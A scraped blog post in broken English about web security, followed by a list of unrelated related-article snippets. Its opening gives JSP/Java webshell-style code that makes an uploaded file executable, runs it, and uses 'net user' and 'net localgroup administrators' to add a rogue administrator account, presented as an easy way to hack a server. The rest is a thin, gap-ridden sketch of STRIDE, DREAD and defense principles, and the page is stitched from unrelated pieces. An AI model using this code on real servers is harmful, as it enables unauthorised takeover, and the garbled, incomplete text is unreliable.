Talk In Web Security(安全世界观): Devleping a Secure WebSite
Writer:BYSocket(泥沙砖瓦浆木匠)
Reprint it anywhere u want.
Why to write about Web Security?
A java file can hack your server.One JSP can download any file. How to do this?
1. Write a JSP and upload to the server.
2. Use JSP to download any bug by HttpClient.
3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write.Its easy but useful:
1
2
3
4
5
6
7
8
9
10
11
|
< font size = "4" face = "宋体" > if(!IsWindows()) { Process process = Runtime.getRuntime().exec("chmod 777 "+strExeFile); if (process.waitFor() != 0) out.println("FAIL ---> when open file"); } Process process = Runtime.getRuntime().exec(strExeFile); if (process.waitFor() == 0) out.println("SUCCESS ---> When open the file");</ font > |
Use Java to open the bug.And then get an administrator user.
1
2
3
4
5
6
7
8
9
10
11
12
|
if(IsWindows()) { String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add"; Process process = Runtime.getRuntime().exec(execStr); if (process.waitFor() == 0) { Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add"); } else out.print("FAIL ---> when " + execStr); } |
Its about how to use java to get add an administrator user.
Here are some injections that we can see anywhere.So we need Learn the Web Security. First we can learn from the Web history.
Some of Web Security needed to know
Since the environment getting worse,like Haze.So many persons wear Masks when going out.Just like the way to protect ourselves ,we trust the Masks. Its the same as web security.
Note:’Web Security is based on the trust,every way to design on Web Security is also based on the trusts.’
Many web attacks like Haze:
1. XSS
2. CRLF Injection
3. X-PATH Injection
4. HTML Injection
5. JavaScript Injection
XSS Development:
So there is a question:’How to analysis the web security of software or project?’
STRIDE (security) DREAD by Microsoft
STRIDE
STRIDE is a system developed by Microsoft for thinking about computer security threats.The threat categories are:
1. Spoofing of user identity
2. Tampering
3. Repudiation
4. Infomation disclosure
5. Denial of Service
6. Elevation of privilege
DREAD
The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:
1. Damage potential: How great is the damage if the vulnerability is exploited?
2. Reproducibility: How easy is it to reproduce the attack?
3. Exploitability: How easy is it to launch an attack?
4. Affected users: As a rough percentage, how many users are affected?
5. Discoverability: How easy is it to find the vulnerability?
So after these categories,a good way to design on Web Security has some features:
1. Solve problem in effect
2. Good experience for users
3. Low coupling
4. Easy to extend and upgrade
How to Devlep a Secure WebSite
Note: ‘ Security is a normal subject and a poised art.’
1. Secure By Default
Its also the security of users.We can create The White List and The Black List and limits of user operation.
2. Defense in Depth
Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful, I have put together a series of eight webcasts on this topic. Here are 7 levels:
3. Quarantine between Data and Demo
4. Uncertainly of unpredictability
The paramters may be easy to guess.So let them be hard to guess.
Think in Web Security
Like a bucket of water, we trust the bucket and water.Its the Security.When the bucket has the chemistry-poison,the security will be broken.
Note:‘Open Free Share’
G night~
Writer:BYSocket(泥沙砖瓦浆木匠)
Reprint it anywhere u want.
Talk In Web Security(安全世界观): Devleping a Secure WebSite的更多相关文章
- SPRING SECURITY JAVA配置:Web Security
在前一篇,我已经介绍了Spring Security Java配置,也概括的介绍了一下这个项目方方面面.在这篇文章中,我们来看一看一个简单的基于web security配置的例子.之后我们再来作更多的 ...
- System.Web.Security 在winform中是什么命名空间呢
des.Key = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStorin ...
- System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(string, string)已过时的解决办法
FormsAuthentication.HashPasswordForStoringInConfigFile 方法是一个在.NET 4.5中已经废弃不用的API,参见: https://msdn.mi ...
- ref:web security最新学习资料收集
ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-S ...
- 『转』Dr.Web Security Space 8 – 免费3个月
简短的测试五个问题,任意回答问题,都将获得Dr.Web Security Suite 3个月免费许可证以及大蜘蛛企业安全套件2个月来保护整个公司!活动地址:https://www.drweb.com/ ...
- [Security] Web Security Essentials
In this course, we'll learn how to exploit and then mitigate several common Web Security Vulnerabili ...
- web hack & web security
web hack & web security https://www.hacksplaining.com/lessons https://www.hacksplaining.com/ OK ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
随机推荐
- idea启动springboot+jsp项目出现404
场景:用IntelliJ IDEA 启动 springBoot项目访问出现404,很皮,因为我用eclipse开发时都是正常的,找了很久,什么加注释掉<scope>provided< ...
- CODEFORCES ROUND #740 ANALYSES BY TEAM:RED & BLACK
A.Alyona and copybooks Problems: 给你一个数n和代价分别为a, b, c.数量不限的1, 2, 3,求将n凑成4的倍数的最小代价 Analysis: cj:取个模随便凑 ...
- 81、iOS本地推送与远程推送详解
一.简介 分为本地推送和远程推送2种.可以在应用没打开甚至手机锁屏情况下给用户以提示.它们都需要注册,注册后系统会弹出提示框(如下图)提示用户石否同意,如果同意则正常使用:如果用户不同意则下次打开程序 ...
- JAVA Bean和XML之间的相互转换 - XStream简单入门
JAVA Bean和XML之间的相互转换 - XStream简单入门 背景介绍 XStream的简介 注解简介 应用实例 背景介绍 我们在工作中经常 遇到文件解析为数据或者数据转化为xml文件的情况, ...
- JavaGC学习笔记
1.简介Java在JVM虚拟机上的垃圾回收(GC)机制,在合适的时间触发垃圾回收,将不需要的内存空间回收释放,避免无限制的内存增长导致的OOM. 1.1 Java堆内存结构Java将堆内存分为3大部分 ...
- Java工具eclipse控制台console输出乱码问题
捣鼓了一下午,终于tm解决! 我的是Scanner读入,println打印乱码问题. 首先在cmd窗口运行java,是没有乱码问题的,这证明了在cmd窗口时Scanner输入的和println打印的编 ...
- js 原型链解密
1.对象继承 javaScript的继承不是通过class实现的,而是通过“原型对象”(prototype). 1.每一个函数都有一个原型对象 2.每一个实例对象都有一个_proto_属性 2.原型链 ...
- 10.1牛客J题
https://www.nowcoder.com/acm/contest/201/J Description: 给你一行括号,定义了括号合格的形式,然后Q次询问,问你这个区间内括号是否合格 Solut ...
- 使用Spring+MySql实现读写分离(三)主从复制
mysql 主(master) 从(slave) 复制的原理: 1. master将数据改变记录到二进制日志(binary log)中,也即是配置文件log-bin指定的文件(这些记录叫 ...
- Android-Java-普通类与抽象类(覆盖)&方法重载
覆盖都是子类与父类之间 & 接口与实现类之间 才会产生:覆盖 有很多名称,覆盖,复写,重写 都是一个意思: 注意:重载都是方法之间 方法同名 不同参数,就属于重载: 普通类-覆盖: 描述An ...